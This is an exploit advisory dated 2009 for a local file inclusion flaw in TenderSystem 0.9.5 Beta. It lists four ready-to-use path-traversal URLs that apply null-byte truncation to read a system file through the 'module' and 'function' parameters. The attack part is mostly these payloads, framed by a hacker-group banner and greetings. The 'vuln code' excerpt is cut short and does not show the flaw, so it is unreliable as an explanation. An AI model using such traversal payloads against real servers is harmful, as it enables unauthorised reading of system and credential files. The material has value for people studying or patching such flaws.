Tender System 0.9.5b LFI :

Date : 2009-12-14 Author : Packetdeath
  __________                __           __      .___             __  .__     
  \______   \_____    ____ |  | __ _____/  |_  __| _/____ _____ _/  |_|  |__  
   |     ___/\__   _/ ___|  |/ // __    __/ __ |/ __ \__  \   __  |   
   |    |     / __ \  \___|    <  ___/|  | / /_/   ___/ / __ |  | |   Y  
   |____|    (____  /\___  >__|_ \___  >__| \____ |\___  >____  /__| |___|  /
                  /     /     /    /          /    /     /          / 
				  
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS 
I was unable to get this to work on a Linux server. Further testing may be required.
 ------------------------------------------------------------------------------------------
Target: TenderSystem 
Version: 0.9.5 Beta
Site  http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: [email protected]
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
------------------------------------------------------------------------------------------- 

Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login



http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login



http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html


http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php: 

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------

Some things are better left unsaid <3
... That is all.

/Packetdeath

C1

 

C2

 

C3